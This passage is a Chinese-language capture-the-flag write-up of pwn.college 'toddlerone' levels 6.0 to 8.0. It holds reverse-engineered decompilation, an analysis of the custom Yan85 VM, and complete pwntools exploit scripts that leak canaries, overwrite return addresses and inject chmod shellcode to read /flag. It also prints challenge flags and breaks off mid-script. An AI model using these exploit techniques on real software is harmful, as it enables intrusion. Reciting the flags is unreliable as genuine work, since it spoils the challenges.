  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  putchar(10);
  printf("You said: %s\n", (const char *)buf);
  puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()");
  puts("call to see the hidden backdoor!");
  if ( strstr((const char *)buf, "REPEAT") )
  {
    puts("Backdoor triggered! Repeating challenge()");
    return challenge(v11, v10, v9);
  }
  else
  {
    puts("Restricting system calls (default: kill)");
    v17 = seccomp_init(0LL);
    for ( i = 0; i <= 1; ++i )
    {
      v6 = v16[i];
      v7 = (const char *)seccomp_syscall_resolve_num_arch(0LL, v6);
      printf("Allowing syscall: %s (number %i)\n", v7, v6);
      if ( (unsigned int)seccomp_rule_add(v17, 2147418112LL, (unsigned int)v16[i], 0LL) )
        __assert_fail(
          "seccomp_rule_add(ctx, SCMP_ACT_ALLOW, syscalls_allowed[i], 0) == 0",
          "/challenge/toddlerone-level-6-0.c",
          0x97u,
          "challenge");
    }
    if ( (unsigned int)seccomp_load(v17) )
      __assert_fail("seccomp_load(ctx) == 0", "/challenge/toddlerone-level-6-0.c", 0x9Au, "challenge");
    puts("Goodbye!");
    return 0LL;
  }
}

得，果不出我所料，这 seccomp 不就来了嘛～

其实不用 seccomp-tools 也行，不过这里也贴一下好啦：

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x06 0xc000003e  if (A != ARCH_X86_64) goto 0008
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x03 0xffffffff  if (A != 0xffffffff) goto 0008
 0005: 0x15 0x01 0x00 0x00000001  if (A == write) goto 0007
 0006: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x06 0x00 0x00 0x00000000  return KILL

seccomp_rule_add 会允许 v16[i] 处保存的系统调用，v16[i] 处保存的两个默认系统调用分别是 write (1) 和 exit_group (231)，究其原因是因为程序执行完 seccomp 后还需要调用 puts 函数，而 puts 函数就需要这两个系统调用才可以执行。

所以我们有两个可用的系统调用可以发挥（怎么发挥？栈溢出过去覆盖成自己的～），这里还是选择 chmod，允许了 chmod 后还需要允许 write 才可以成功执行 chmod，我猜应该是因为 chmod 会去修改 inode 中保存的权限信息，而修改它需要 write 系统调用，所以使用 chmod 的话我们必须同时允许 write 才行。

需要注意的就是必须先允许主要系统调用，再允许其内部依赖的系统调用，否则 seccomp 会直接阻止主要调用。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p32,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-6-0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

backdoor = b"REPEAT "
padding_size = 0x88
backdoor_trigger = b"".ljust(padding_size - len(backdoor) + 1, b"A") + backdoor
trigger_length = str(len(backdoor_trigger))
allowed_syscall_offset = 0x74
padding_to_ret = b"".ljust(0x18, b"A")
fixed_offset = 0x11E0


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_data(target):
    try:
        target.sendlineafter(b"Payload size: ", trigger_length)
        send_payload(target, backdoor_trigger)
        response = target.recvuntil(backdoor)
        log.debug(response.decode("utf-8", errors="ignore"))

        canary = b"\x00" + target.recv(0x7)
        rbp = target.recv(0x6)
        log.success(f"Canary: {to_hex_bytes(canary)}\nRBP: {to_hex_bytes(rbp)}")

        return [canary, rbp]
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary, rbp = leak_data(target)
    rbp = int.from_bytes(rbp, "little")

    ret_addr = rbp - fixed_offset

    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(allowed_syscall_offset - shellcode_length, b"A")
    shellcode += p32(0x5A)  # SYS_chmod
    shellcode += p32(0x01)  # SYS_write
    shellcode += b"".ljust(padding_size - (allowed_syscall_offset + 0x8), b"A")
    shellcode += canary
    shellcode += padding_to_ret
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        response = target.recvall(timeout=5)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(target)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Uh7pFxiL1QPHZzDdWNmvsW7FH_Y.0VOyMDL5cTNxgzW}

Level 6.1

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode, reverse engineering, seccomp, and a method of tricking the challenge into executing your payload.

Write-up

参见 Level 6.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p32,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-6-1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

backdoor = b"REPEAT "
padding_size = 0x38
backdoor_trigger = b"".ljust(padding_size - len(backdoor) + 1, b"A") + backdoor
trigger_length = str(len(backdoor_trigger))
allowed_syscall_offset = 0x2C
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = 0x1120


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def leak_data(target):
    try:
        target.sendlineafter(b"Payload size: ", trigger_length)
        send_payload(target, backdoor_trigger)
        response = target.recvuntil(backdoor)
        log.debug(response.decode("utf-8", errors="ignore"))

        canary = b"\x00" + target.recv(0x7)
        rbp = target.recv(0x6)
        log.success(f"Canary: {to_hex_bytes(canary)}\nRBP: {to_hex_bytes(rbp)}")

        return [canary, rbp]
    except Exception as e:
        log.exception(f"An error occurred while leaking canary: {e}")


def construct_payload(target):
    canary, rbp = leak_data(target)
    rbp = int.from_bytes(rbp, "little")

    ret_addr = rbp - fixed_offset

    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(allowed_syscall_offset - shellcode_length, b"A")
    shellcode += p32(0x5A)  # SYS_chmod
    shellcode += p32(0x01)  # SYS_write
    shellcode += b"".ljust(padding_size - (allowed_syscall_offset + 0x8), b"A")
    shellcode += canary
    shellcode += padding_to_ret
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        response = target.recvall(timeout=5)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(target)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Mipexe2lNIdsBTQy-Vxsp5mdVZl.0FMzMDL5cTNxgzW}

Level 7.0

Information

Category: Pwn

Description

Write a full exploit for a custom VM involving injecting shellcode and a method of tricking the challenge into executing it by locating and utilizing a bug in the challenge. Note, ASLR is disabled!

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  const char **v4; // [rsp+0h] [rbp-420h] BYREF
  int v5; // [rsp+Ch] [rbp-414h]
  _BYTE buf[1024]; // [rsp+10h] [rbp-410h] BYREF
  int v7; // [rsp+410h] [rbp-10h]
  __int16 v8; // [rsp+414h] [rbp-Ch]
  char v9; // [rsp+416h] [rbp-Ah]
  __int64 savedregs; // [rsp+420h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+428h] [rbp+8h] BYREF

  v5 = argc;
  v4 = argv;
  printf("[+] Welcome to %s!\n", *argv);
  puts("[+] This challenge is an custom emulator. It emulates a completely custom");
  puts("[+] architecture that we call \"Yan85\"! You'll have to understand the");
  puts("[+] emulator to understand the architecture, and you'll have to understand");
  puts("[+] the architecture to understand the code being emulated, and you will");
  puts("[+] have to understand that code to get the flag. Good luck!");
  puts("[+]");
  puts("[+] This level is a full Yan85 emulator. You'll have to reason about yancode,");
  puts("[+] and the implications of how the emulator interprets it!");
  setvbuf(_bss_start, 0LL, 2, 1uLL);
  memset(buf, 0, sizeof(buf));
  v7 = 0;
  v8 = 0;
  v9 = 0;
  printf("[!] This time, YOU'RE in control! Please input your yancode: ");
  puts("[+] This challenge doesn't allow you to call open via the sys instruction, but luckily,");
  puts("[+] it makes a memory error that will let you accomplish your goals. Good luck!");
  read(0, buf, 0x300uLL);
  sp_ = (__int64)&v4;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v4) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("[!] Let's take a look at the stack before we execute your yancode:");
  DUMP_STACK(sp_, sz_);
  printf("[-] the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("[-] the saved return address is at %p\n", (const void *)rp_);
  printf("[-] the saved return address is currently pointing to %p.\n", *(const void **)rp_);
  puts("[+]");
  puts("[+] This is a *teaching* challenge, which means that it will output");
  puts("[+] a trace of the Yan85 code as it processes it. The output is here");
  puts("[+] for you to understand what the challenge is doing, and you should use");
  puts("[+] it as a guide to help with your reversing of the code.");
  puts("[+]");
  interpreter_loop((__int64)buf);
  puts("[+] Exited interpreter loop! I hope you accomplished what you wanted!");
  puts("[!] Let's take a look at the stack after your yancode executed:");
  DUMP_STACK(sp_, sz_);
  printf("[-] the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("[-] the saved return address is at %p\n", (const void *)rp_);
  printf("[-] the saved return address is now pointing to %p.\n", *(const void **)rp_);
  return 0;
}

Wow, Yan85 Virtual Machine!

第一次见这种自定义指令集的题，感觉还是很新颖的！OK，通过简单的观察分析我们大致可以知道，这题会使用一套自定义指令集，称为 yancode！而剩下的不用我说你应该也清楚，那就是用这套自定义指令集来写 shellcode，想办法获取 flag。

所以得先逆向分析搞清楚这个虚拟机提供了哪些指令，指令的机器码等等这些最基本的元素，才有能力用它编写 shellcode，攻击的思路则与用什么指令集无关，随你发挥～

程序的 main 函数我贴在上面了，我本来想尝试通过 read(0, buf, 0x300uLL); 来覆盖返回地址的，但是我们的输入大小被限制在 0x300 了，根本摸不到……也是，这可是传说中的 Yan85，怎么可能那么容易哈哈哈。那么继续往下看，我们发现，它会调用 interpreter_loop((__int64)buf) 来解析 buf 中的指令。

这个函数的定义如下：

__int64 __fastcall interpreter_loop(__int64 a1)
{
  unsigned __int8 v1; // al
  __int64 result; // rax

  while ( 1 )
  {
    result = *(unsigned __int8 *)(a1 + 1029);
    if ( (_BYTE)result == 0xFF )
      break;
    v1 = *(_BYTE *)(a1 + 1029);
    *(_BYTE *)(a1 + 1029) = v1 + 1;
    interpret_instruction(
      a1,
      *(unsigned __int16 *)(a1 + 3LL * v1) | ((unsigned __int64)*(unsigned __int8 *)(a1 + 3LL * v1 + 2) << 16));
  }
  return result;
}

它通过 interpret_instruction(unsigned __int8 *a1, __int64 a2) 将 buf 中指令的机器码解析为 yancode 的伪代码。

并且，当 (_BYTE)result == 0xFF 时，结束 interpreter_loop，也就是停止翻译指令了。结合下文的寄存器分析我们知道，这个 result 其实就是 i 寄存器。

而 *(unsigned __int16 *)&a1[3 * v1] | ((unsigned __int64)a1[3 * v1 + 2] << 16) 所做的就是合并出一条三字节指令。

interpret_instruction 函数的定义如下：

__int64 __fastcall interpret_instruction(unsigned __int8 *a1, __int64 a2)
{
  __int64 result; // rax

  printf(
    "[V] a:%#hhx b:%#hhx c:%#hhx d:%#hhx s:%#hhx i:%#hhx f:%#hhx\n",
    a1[1024],
    a1[1025],
    a1[1026],
    a1[1027],
    a1[1028],
    a1[1029],
    a1[1030]);
  printf("[I] op:%#hhx arg1:%#hhx arg2:%#hhx\n", BYTE1(a2), (unsigned __int8)a2, BYTE2(a2));
  if ( (a2 & 0x400) != 0 )
    interpret_imm(a1, a2);
  if ( (a2 & 0x800) != 0 )
    interpret_add(a1, a2);
  if ( (a2 & 0x100) != 0 )
    interpret_stk(a1, a2);
  if ( (a2 & 0x8000) != 0 )
    interpret_stm(a1, a2);
  if ( (a2 & 0x1000) != 0 )
    interpret_ldm(a1, a2);
  if ( (a2 & 0x200) != 0 )
    interpret_cmp(a1, a2);
  if ( (a2 & 0x2000) != 0 )
    interpret_jmp(a1, a2);
  result = BYTE1(a2) & 0x40;
  if ( (a2 & 0x4000) != 0 )
    return interpret_sys(a1, a2);
  return result;
}

这里，我们可以看到 Yan85 提供的寄存器（a、b、c、d、s、i、f）在内存中的保存位置分别是 a1[1024] ~ a1[1030]。

我大胆猜测一下这些寄存器的用途：a、b、c、d 应该是四个通用寄存器；s 应该是栈指针寄存器；i 应该是指令指针寄存器；f 应该是标志寄存器。

然后，第 14 行会输出一个提示信息告诉我们当前 opcode、arg1、arg2 的值，这对我们理解内存中的数据如何解析成指令很有帮助。

这里 IDA 的反汇编使用了 BYTE1、BYTE2 宏。它们的作用分别是取一个数据的第 1 位、第 2 位。同理，BYTE0 取第 1 位，类似的宏应该有 BYTE0 ~ BYTE7。

我们以数据 x = 0x1122334455667788 为例，BYTE1 做的应该是 (x >> 8) & 0xFF，得到 0x77；BYTE2 做的应该是 (x >> 16) & 0xFF，得到 0x66。

知道了这些后，我很很容易推断出 yancode 使用的三字节指令在内存中的布局 (LSB) 为：arg2 opcode arg1。

最后，opcode 的判断是根据 (a2 & N) != 0 来实现的。其中 N 对于不同的 opcode 来说是不一样的。

假设我需要执行 add 操作，那就必须满足 (a2 & 0x800) != 0，其中 a2 是你的一整条指令（操作码加操作数）。程序会判断你这条指令与 0x800 的逻辑与结果是否为 0，不为 0 则断言这条指令的 opcode 是 add，再利用你给的 args 去调用 interpret_add(a1, a2)，也就是解析 add 指令的具体操作。

0x800 的二进制表示是 0b100000000000，所以为了得到一条 add 指令，我们要做的就是令 bin(a2) 的第 11 位为 1。

好了，下面列张表，记录一下各指令的 opcode，答案不为一，这里给出的是最小表示。另外，我顺便还分析了一下每条指令的功能，所以这张表也顺便记录了不同指令的使用格式和简介。

Opcode	Instruction	Description
`\x04`	`imm reg, byte`	Load `byte` to `reg` register.
`\x08`	`add reg1, reg2`	Add `reg2` to `reg1`.
`\x01`	`stk reg1, reg2`	Push `reg2` if `reg2` is not zero, pop `reg1` if `reg1` is not zero.
`\x80`	`stm reg1, reg2`	It does the same as `*reg1 = reg2`.
`\x10`	`ldm reg1, reg2`	It does the same as `reg1 = *reg2`
`\x02`	`cmp reg1, reg2`	Compare two registers and set the `f` register status.
`\x20`	`jmp flags, reg`	If `flags != 0` and `flags` setted in `f`, jump to the address saved in `reg`.
`\x40`	`sys SYS_num, reg`	Execute specific `SYS_num` system call, return value saved in `reg`.

对于 cmp 指令，不同比较结果的标志位状态表如下：

`f` status	Compare results
`\x10`	`reg1 < reg2`
`\x02`	`reg1 > reg2`
`\x04`	`reg1 = reg2`
`\x01`	`reg1 != reg2`
`\x08`	`reg1, reg2 = 0`

对于 sys 指令，我们可用的系统调用号如下：

NR	SYSCALL NAME
`\x02`	`SYS_open`
`\x08`	`SYS_read_code`
`\x10`	`SYS_read_memory`
`\x01`	`SYS_write`
`\x20`	`SYS_sleep`
`\x04`	`SYS_exit`

接下来是搞清楚寄存器的机器码，我们发现一个 describe_register 函数，作用是把寄存器机器码解析为对应寄存器名称。

__int16 *__fastcall describe_register(char a1)
{
  switch ( a1 )
  {
    case 1:
      return aAbcdsif;
    case 8:
      return &aAbcdsif[1];
    case 16:
      return &aAbcdsif[2];
    case 2:
      return &aAbcdsif[3];
    case 64:
      return &aAbcdsif[4];
    case 4:
      return &aAbcdsif[5];
    case 32:
      return &aAbcdsif[6];
  }
  if ( a1 )
    return (__int16 *)"?";
  return (__int16 *)"NONE";
}

.rodata:00000000004031CC aAbcdsif:                               ; DATA XREF: describe_register+13↑o
.rodata:00000000004031CC                                         ; describe_register+22↑o ...
.rodata:00000000004031CC                 text "UTF-16LE", 'abcdsif'

还有一个 write_register 函数，用来向寄存器写入数据：

_BYTE *__fastcall write_register(_BYTE *a1, char a2, char a3)
{
  _BYTE *result; // rax

  switch ( a2 )
  {
    case 1:
      result = a1;
      a1[1024] = a3;
      break;
    case 8:
      result = a1;
      a1[1025] = a3;
      break;
    case 16:
      result = a1;
      a1[1026] = a3;
      break;
    case 2:
      result = a1;
      a1[1027] = a3;
      break;
    case 64:
      result = a1;
      a1[1028] = a3;
      break;
    case 4:
      result = a1;
      a1[1029] = a3;
      break;
    case 32:
      result = a1;
      a1[1030] = a3;
      break;
    default:
      crash(a1, "unknown register");
  }
  return result;
}

综合上面两个函数我们得到了不同寄存器所对应的机器码和寄存器在内存中的偏移地址：

Opcode	Register	Offset
`\x01`	`a`	`0x400`
`\x08`	`b`	`0x401`
`\x10`	`c`	`0x402`
`\x02`	`d`	`0x403`
`\x40`	`s`	`0x404`
`\x04`	`i`	`0x405`
`\x20`	`f`	`0x406`
`Undefined`	`?`	`Non-existent`
`\x00`	`NONE`	`Non-existent`

某些非法情况会触发 crash 函数：

// positive sp value has been detected, the output may be wrong!
void __fastcall __noreturn crash(__int64 a1, const char *a2)
{
  printf("Machine CRASHED due to: %s\n", a2);
  ((void (__fastcall __noreturn *)(__int64, __int64))sys_exit)(a1, 1LL);
}

至此，我们基本上已经摸清楚整个 Yan85 架构了，下面来说说这题的攻击思路。

一开始我以为是要用纯 yancode 来写 shellcode，后来发现确实要用 yancode，但并非整个 shellcode 都得用 yancode 来写。这困扰了我将近一天时间（其实也就几个小时，因为我这几天畏难摆烂，所以真正在思考的时间很少……），期间我想了尝试用 yancode 读取 flag 的各种姿势，差点放弃……因为这个先入为主的思维定势浪费了不少时间，希望下次别了。提到这个，我越发觉得需要早点入手一本纸质版的***《思考，快与慢》***了。电子版着实看不下去，还是纸质版的适合我。虽然这个寒假应该不会有什么时间读……不管了，先买了再说，反正早晚得有～

嗯……我注意到 SYS_read_memory 系统调用内部进行了一些有趣的操作：

if ( (a2 & 0x10) != 0 )
{
  puts("[s] ... read_memory");
  v5 = sys_read(a1, a1[1024], &a1[a1[1025] + 0x300], a1[1026]);
  write_register(a1, BYTE2(a2), v5);
}

ssize_t __fastcall sys_read(__int64 a1, int a2, void *a3, size_t a4)
{
  return read(a2, a3, a4);
}

// attributes: thunk
ssize_t read(int fd, void *buf, size_t nbytes)
{
  return read(fd, buf, nbytes);
}

它把数据读到 &a1[a1[1025] + 0x300] 这个位置。我们发现 main 中的 read(0, buf, 0x300uLL); 只让我们读最高 0x300 字节到 buf，但是这个 SYS_read_memory 却可以让我们把数据读到 buf[offset + 0x300] 处。敏感吗？熟悉吗？0x300？这不是法外之地吗？

很幸运，我们确实可以用它来覆盖返回地址。但这里我脑子一抽又踩了一个坑，我想着把返回地址覆盖为 sys_open 函数的地址，然后发现就算我可以返回到 sys_open 又如何……

好在五分钟后我就从这个破坑里面爬出来了……我意识到应该结合 main 中的 read，把我的 shellcode 读到内存中，返回地址覆盖为我 shellcode 的起始地址，这才对嘛。

所以最后的攻击链应该是 main 中的 read 读取 yancode + shellcode，其中 yancode 负责调用 SYS_read_memory 来覆盖返回地址，返回地址我们修改为 shellcode 的起始地址，perfect.

调用 SYS_read_memory 需要用到的三个参数分别通过三个寄存器传参。a 传递文件描述符、b 传递偏移、c 传递最大读取大小。

对了，因为 buf[0x300] 到返回地址还有一段不小的距离，所以我们的 offset 直接选择三字节指令可承受的最大值 0xff，这个随意，只是想负责的说一下以便于你可以更好的理解我的 exp。

最后，说说做完这题后的感想吧……我觉得自己在逆向工程方面的能力还是有巨大提升空间的（对的被你看出来了，我就是菜，又怎样 LOL），一定要静下心来逆向分析啊，这太重要了。讲真这题的逆向其实很简单，就是单纯畏难不想看……我也搞不懂为什么每次碰到难题都会特别的畏难，没有激情，艹我可不能只会擅长的东西啊……动态调试能力与之前相比倒是提升了很多，真棒～

再分享一下刚做完的时候的状态 LOL

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
    time,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-7-0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *interpret_sys+397
b *main+715
c
"""

yancode_length = 0
stack_base = 0x7FFFFFFDE000
padding_to_ret = b"".ljust(0x19, b"A")


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    global yancode_length

    """
    arg1 op arg2
    """
    yancode = b"\x01\x04\x00"  # imm a, 0x00
    yancode += b"\x08\x04\xff"  # imm b, 0xff
    yancode += b"\x10\x04\x21"  # imm c, 0x21
    yancode += b"\x10\x40\x01"  # sys 0x02, a
    yancode += b"\x04\x04\xff"  # imm i, 0xff
    yancode_length = len(yancode)

    shellcode = yancode
    shellcode += asm(shellcraft.chmod("f", 0o4))

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        send_payload(target, payload)

        ret2shellcode = padding_to_ret
        ret2shellcode += p64(stack_base + yancode_length)

        target.sendlineafter(b"... read_memory", ret2shellcode)

        response = target.recvall(timeout=5)
        log.debug(response.decode("utf-8", errors="ignore"))

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    global stack_base

    start_time = time.time()

    while True:
        try:
            target = launch(debug=False)
            payload = construct_payload()

            if attack(target, payload):
                break

            stack_base = stack_base + 0x8
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")

    end_time = time.time()
    elapsed_time = end_time - start_time
    log.success(f"Total elapsed time: {elapsed_time:.2f} seconds.")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{4KYvwTY0ajVZJykveF7xtOj0Kfc.0VMzMDL5cTNxgzW}

Level 7.1

Information

Category: Pwn

Description

Write a full exploit for a custom VM involving injecting shellcode and a method of tricking the challenge into executing it by locating and utilizing a bug in the challenge. Note, ASLR is disabled!

Write-up

逆向分析我们发现这题把 opcode 都改掉了，所以我们还得先重新确认各指令的 opcode 才行。之后的话思路和上题差不多了，不过栈地址我这次不打算爆破。write 可以从栈中泄漏出来一点栈地址之类的，以它为基，减去 shellcode 的偏移，得到 shellcode 的地址。

嗯，再推荐一个 IDA Plugin，叫 syms2elf。它可以导出带符号表的 ELF 文件，对于那些 stripped，分析起来困难的二进制文件，有了这个插件不要太爽。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-7-1"
HOST, PORT = "localhost", 1337

gdbscript = """
b write@plt
b *0x401efc
c
"""

shellcode_offset = 0x4EC
padding_to_ret = b"".ljust(0x19, b"A")


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    # stage 1: leak stack base address
    yancode = b"\x04\x80\x01"  # imm a, 0x01
    yancode += b"\x10\x80\xff"  # imm b, 0xff
    yancode += b"\x02\x80\x31"  # imm c, 0x31
    yancode += b"\x10\x02\x04"  # sys 0x10, a

    # stage 2: overwrite return address
    yancode += b"\x04\x80\x00"  # imm a, 0x00
    yancode += b"\x10\x80\xff"  # imm b, 0xff
    yancode += b"\x02\x80\x21"  # imm c, 0x21
    yancode += b"\x02\x02\x04"  # sys 0x02, a
    yancode += b"\x20\x80\xff"  # imm i, 0xff

    # stage 3: ret2shellcode
    shellcode = yancode
    shellcode += asm(shellcraft.chmod("f", 0o4))

    return shellcode


def leak_data(response):
    leaked_stack_base = response[-8:]
    log.debug(leaked_stack_base.decode("utf-8", errors="ignore"))
    log.success(f"Leaked stack base address: {to_hex_bytes(leaked_stack_base)}")

    return int.from_bytes(leaked_stack_base, "little")


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        send_payload(target, payload)

        response = target.recv()
        log.debug(response.decode("utf-8", errors="ignore"))

        stack_base = leak_data(response)

        ret2shellcode = padding_to_ret
        ret2shellcode += p64(stack_base - shellcode_offset)

        send_payload(target, ret2shellcode)

        try:
            with open("./f", "r") as file:
                content = file.read()
                log.success(content)

                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{8GNqGB_LW-iRUy4il8m7fn0YMK5.0lMzMDL5cTNxgzW}

Level 8.0

Information

Category: Pwn

Description

Write a full exploit for a custom VM involving injecting shellcode, and a method of tricking the challenge into executing it by locating and utilizing a bug in the challenge.

Write-up

啊，就是同时泄漏栈地址和 canary 地址呗，没啥好讲的。自己逆向分析 yancode 的操作码。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-8-0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *sys_write+43
b *sys_read
b *main+750
c
"""

shellcode_offset = 0x4ED
padding_to_canary = b"".ljust(0x9, b"A")
padding_to_ret = b"".ljust(0x8, b"A")


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    # stage 1: leak stack base address
    yancode = b"\x01\x04\x01"  # imm a, 0x01
    yancode += b"\xff\x40\x01"  # imm b, 0xff
    yancode += b"\x2f\x02\x01"  # imm c, 0x2f
    yancode += b"\x04\x10\x08"  # sys 0x10, a

    # stage 2: overwrite return address
    yancode += b"\x00\x04\x01"  # imm a, 0x00
    yancode += b"\xff\x40\x01"  # imm b, 0xff
    yancode += b"\x21\x02\x01"  # imm c, 0x21
    yancode += b"\x04\x02\x08"  # sys 0x02, a
    yancode += b"\xff\x20\x01"  # imm i, 0xff

    # stage 3: ret2shellcode
    shellcode = yancode
    shellcode += asm(shellcraft.chmod("f", 0o4))

    return shellcode


def leak_data(response):
    leaked_canary = response[-0x26:-0x1E]
    leaked_stack_base = response[-0x6:]
    log.success(f"Leaked canary: {to_hex_bytes(leaked_canary)}")
    log.success(f"Leaked stack base address: {to_hex_bytes(leaked_stack_base)}")

    return [
        int.from_bytes(leaked_canary, "little"),
        int.from_bytes(leaked_stack_base, "little"),
    ]


